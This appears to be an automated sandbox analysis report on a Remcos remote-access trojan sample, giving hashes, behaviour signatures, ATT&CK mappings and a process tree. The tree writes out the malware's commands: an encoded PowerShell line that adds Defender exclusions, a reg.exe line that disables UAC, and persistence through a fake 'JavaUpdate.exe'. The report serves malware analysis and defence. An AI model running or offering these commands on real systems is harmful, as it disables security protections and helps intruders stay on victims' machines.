Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-04-2024 08:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe

  • Size

    118KB

  • MD5

    58250357e2818257885f8ab3321085c2

  • SHA1

    edec3680ec5558bad5aaed1f8dd1f5f05f8243ca

  • SHA256

    f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015

  • SHA512

    d403ca7d62033f49e07ad05a144d59a83b81bede2d98d36284974741e72df56ee0dfbdd1d5ae7eac0587ad128b81f2c50da682b28115230e20e4afff2bf07b0e

  • SSDEEP

    3072:OVjUCVOwcSlBaTPbfM+6b4UGYTX7LX9MD:AjUWcegDbfMJ+A7j9

Score
10/10
remcosevasionpersistencerattrojan

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
    "C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAaAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABzACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4104
    • C:\Users\Admin\AppData\Local\Temp\test.exe
      "C:\Users\Admin\AppData\Local\Temp\test.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies WinLogon
      • Suspicious use of WriteProcessMemory
      PID:3960
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1332
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:5084
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\SysWOW64\PING.EXE
          PING 127.0.0.1 -n 2
          4⤵
          • Runs ping.exe
          PID:2500
        • C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe
          "C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe"
          4⤵
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • Adds Run key to start application
          • Modifies WinLogon
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\SysWOW64\cmd.exe
            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              6⤵
              • UAC bypass
              • Modifies registry key
              PID:2836
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            5⤵
              PID:4060
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4280 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1932

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      3
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Winlogon Helper DLL

      2
      T1547.004

      Privilege Escalation

      Boot or Logon Autostart Execution

      3
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Winlogon Helper DLL

      2
      T1547.004

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Defense Evasion

      Modify Registry

      5
      T1112

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Impair Defenses

      1
      T1562

      Disable or Modify Tools

      1
      T1562.001

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Remote System Discovery

      1
      T1018

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwpkkmaj.2fy.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\install.bat
        Filesize

        158B

        MD5

        552f91e198b5402fad934b3c7a45b5c2

        SHA1

        6c766bc9d51ba70a7769047e5ae107b798e4ed12

        SHA256

        9c2b2133eb284e764155a96798efdff4e67e2ef38f9501ca4d9b066cfbf0da37

        SHA512

        47128e082b7c541360e26968d9a009e38613da06ddfa14a288d90d8ca6efe8574b67d06673e52cff30d4967c42f0b871c8bd0db4b6f1b80c2db39b8d1ae1adaf

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\test.exe
        Filesize

        100KB

        MD5

        f3b7cddc98281485c9bcf40314a8cfa1

        SHA1

        a797b03d4f0aa176ac3c31509a612ff07c1a15d7

        SHA256

        7baa3ae97c421ab54fa95d3fceca3f11900c7fc04970652400d803da18f22122

        SHA512

        5b57a55bd40a4f57222312279989b2398bc472b57a4ca098cdbcc9456b168d9a2fefe54b3fc24ba9fcb1edb9ab60159e6887addda1285184bccb33d76010068a

        Download Submit
      • memory/3016-0-0x0000000000010000-0x0000000000034000-memory.dmp
        Filesize

        144KB

        Download
      • memory/3016-1-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3016-2-0x000000001AC70000-0x000000001AC80000-memory.dmp
        Filesize

        64KB

        Download
      • memory/3016-32-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4104-11-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4104-12-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4104-22-0x00000266E4150000-0x00000266E4172000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4104-24-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4104-27-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

        Download